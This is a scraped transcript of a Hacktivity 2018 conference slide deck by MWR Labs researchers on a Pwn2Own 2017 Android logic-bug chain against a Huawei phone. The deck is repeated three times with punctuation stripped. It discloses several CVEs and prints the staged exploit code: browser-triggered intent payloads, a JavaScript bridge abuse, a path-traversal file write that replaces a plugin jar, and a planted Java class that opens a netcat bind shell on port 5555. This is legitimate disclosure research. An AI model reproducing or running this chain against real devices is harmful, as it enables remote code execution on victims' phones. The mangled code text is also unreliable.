Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper...
Transcript of Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper...
![Page 1: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/1.jpg)
++
Android Pwn2Owning
Hacktivity 2018
PUBLIC
Introduction
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 2: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/2.jpg)
PUBLIC
Introduction
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 3: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/3.jpg)
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
